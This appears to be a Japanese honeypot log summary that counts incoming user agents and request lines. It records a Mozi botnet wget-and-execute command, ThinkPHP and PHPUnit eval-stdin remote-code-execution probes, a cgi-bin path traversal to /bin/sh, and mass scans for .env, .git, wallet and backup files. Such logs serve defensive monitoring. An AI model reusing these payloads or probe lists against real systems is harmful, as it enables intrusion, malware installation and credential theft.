1 Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1
5 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
1 python-requests/2.25.1

リクエスト内容一覧

件数 Method Request Protocol
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 MGLNDD_13.67.44.234_80
17 \x16\x03\x01
1 GET /.apache.env HTTP/1.1
1 GET /.database.env HTTP/1.1
1 GET /.db.env HTTP/1.1
1 GET /.debug.env HTTP/1.1
1 GET /.debug HTTP/1.1
1 GET /.django.env HTTP/1.1
1 GET /.elastic.env HTTP/1.1
1 GET /.env.backup HTTP/1.1
1 GET /.env.bak HTTP/1.1
1 GET /.env.copy HTTP/1.1
1 GET /.env.dev HTTP/1.1
1 GET /.env.development HTTP/1.1
1 GET /.env.local HTTP/1.1
1 GET /.env.new HTTP/1.1
1 GET /.env.prod HTTP/1.1
1 GET /.env.production HTTP/1.1
1 GET /.env.remote HTTP/1.1
1 GET /.env.staging HTTP/1.1
32 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /.laravel.env HTTP/1.1
1 GET /.local HTTP/1.1
1 GET /.mysql.env HTTP/1.1
1 GET /.nginx.env HTTP/1.1
1 GET /.old.env HTTP/1.1
1 GET /.postgres.env HTTP/1.1
1 GET /.production HTTP/1.1
1 GET /.remote HTTP/1.1
1 GET /.vscode/sftp.json HTTP/1.1
1 GET /.web.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
2 GET /aaa9 HTTP/1.1
2 GET /aab8 HTTP/1.1
1 GET /account.json HTTP/1.1
1 GET /accounts.json HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /administrator/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app.config.env HTTP/1.1
1 GET /app.env HTTP/1.1
1 GET /app/.env HTTP/1.1
2 GET /apps/.env HTTP/1.1
1 GET /assets/.env HTTP/1.1
1 GET /audio/.env HTTP/1.1
1 GET /auth.json HTTP/1.1
1 GET /blog/.env HTTP/1.1
1 GET /blogs/.env HTTP/1.1
1 GET /ci/.env HTTP/1.1
1 GET /client/get_targets HTTP/1.1
1 GET /conf.json HTTP/1.1
1 GET /config.env HTTP/1.1
1 GET /config.ini HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /config/.env HTTP/1.1
1 GET /config/config.json HTTP/1.1
1 GET /config/prod.json HTTP/1.1
1 GET /configuration.json HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /core/app/.env HTTP/1.1
1 GET /cron/.env HTTP/1.1
1 GET /cronlab/.env HTTP/1.1
1 GET /database.json HTTP/1.1
2 GET /database/.env HTTP/1.1
1 GET /db.json HTTP/1.1
1 GET /debug/default/view?panel=request HTTP/1.1
1 GET /dev.env HTTP/1.1
9 GET /dispatch.asp HTTP/1.1
1 GET /dotenv.env HTTP/1.1
1 GET /ecosystem.config.json HTTP/1.1
1 GET /env.ini HTTP/1.1
1 GET /exapi/.env HTTP/1.1
6 GET /favicon.ico HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /geoserver HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /key.json HTTP/1.1
1 GET /keys.json HTTP/1.1
1 GET /lab/.env HTTP/1.1
2 GET /laravel/.env HTTP/1.1
1 GET /lib/.env HTTP/1.1
1 GET /main.env HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /myconf.env HTTP/1.1
1 GET /newsite/.env HTTP/1.1
1 GET /pub/ HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /saas/.env HTTP/1.1
1 GET /secret.json HTTP/1.1
1 GET /secrets.json HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /sftp-config.json HTTP/1.1
1 GET /shared/.env HTTP/1.1
2 GET /site/.env HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /sitemaps/.env HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /tools/.env HTTP/1.1
1 GET /tywcb/161343.html HTTP/1.1
1 GET /upl.php HTTP/1.1
2 GET /uploads/.env HTTP/1.1
1 GET /v1/.env HTTP/1.1
1 GET /v2/.env HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wallet.json HTTP/1.1
1 GET /wallets.json HTTP/1.1
1 GET /web-variables.env HTTP/1.1
1 GET /web/.env HTTP/1.1
1 GET /www/.env HTTP/1.1
3 GET http[:]//azenv[.]net/ HTTP/1.1
1 HEAD /.well-known.zip HTTP/1.1
1 HEAD /2021.zip HTTP/1.1
1 HEAD /2022-backup.zip HTTP/1.1
1 HEAD /2022.zip HTTP/1.1
1 HEAD /admin.zip HTTP/1.1
1 HEAD /api.zip HTTP/1.1
1 HEAD /app.zip HTTP/1.1
1 HEAD /backup-2022.zip HTTP/1.1
1 HEAD /backup.zip HTTP/1.1
1 HEAD /backup2022.zip HTTP/1.1
1 HEAD /backups.zip HTTP/1.1
1 HEAD /beta.zip HTTP/1.1
1 HEAD /bootstrap.zip HTTP/1.1
1 HEAD /code.zip HTTP/1.1
1 HEAD /config.zip HTTP/1.1
1 HEAD /configs.zip HTTP/1.1
1 HEAD /configuration.zip HTTP/1.1
1 HEAD /controller.zip HTTP/1.1
1 HEAD /core.zip HTTP/1.1
1 HEAD /database.zip HTTP/1.1
1 HEAD /databases.zip HTTP/1.1
1 HEAD /db.zip HTTP/1.1
1 HEAD /dev.zip HTTP/1.1
1 HEAD /error.zip HTTP/1.1
1 HEAD /exports.zip HTTP/1.1
1 HEAD /framework.zip HTTP/1.1
1 HEAD /home.zip HTTP/1.1
1 HEAD /home1.zip HTTP/1.1
1 HEAD /htdocs.zip HTTP/1.1
1 HEAD /html.zip HTTP/1.1
1 HEAD /include.zip HTTP/1.1
1 HEAD /install.zip HTTP/1.1
1 HEAD /lib.zip HTTP/1.1
1 HEAD /main.zip HTTP/1.1
1 HEAD /module.zip HTTP/1.1
1 HEAD /new.zip HTTP/1.1
1 HEAD /old.zip HTTP/1.1
1 HEAD /public.zip HTTP/1.1
1 HEAD /public_html.zip HTTP/1.1
1 HEAD /root.zip HTTP/1.1
1 HEAD /run.zip HTTP/1.1
1 HEAD /script.zip HTTP/1.1
1 HEAD /scripts.zip HTTP/1.1
1 HEAD /source.zip HTTP/1.1
1 HEAD /sql.zip HTTP/1.1
1 HEAD /src.zip HTTP/1.1
1 HEAD /system.zip HTTP/1.1
1 HEAD /tokenlite.zip HTTP/1.1
1 HEAD /upload.zip HTTP/1.1
1 HEAD /uploads.zip HTTP/1.1
1 HEAD /v1.zip HTTP/1.1
1 HEAD /v2.zip HTTP/1.1
1 HEAD /well-known.zip HTTP/1.1
1 HEAD /work.zip HTTP/1.1
1 HEAD /www.zip HTTP/1.1
1 HEAD /wwwroot.zip HTTP/1.1
1 PATCH /?debug=true HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /apps HTTP/1.1
1 POST /audio HTTP/1.1
1 POST /blog HTTP/1.1
1 POST /blogs HTTP/1.1
6 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /database HTTP/1.1
1 POST /laravel HTTP/1.1
1 POST /newsite HTTP/1.1
1 POST /shared HTTP/1.1
1 POST /site HTTP/1.1
1 POST /sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /sites/default/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /uploads HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /wp-content/wp-plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /www HTTP/1.1
2 PRI * HTTP/2.0
1 PROXY TCP4 192.35.222.19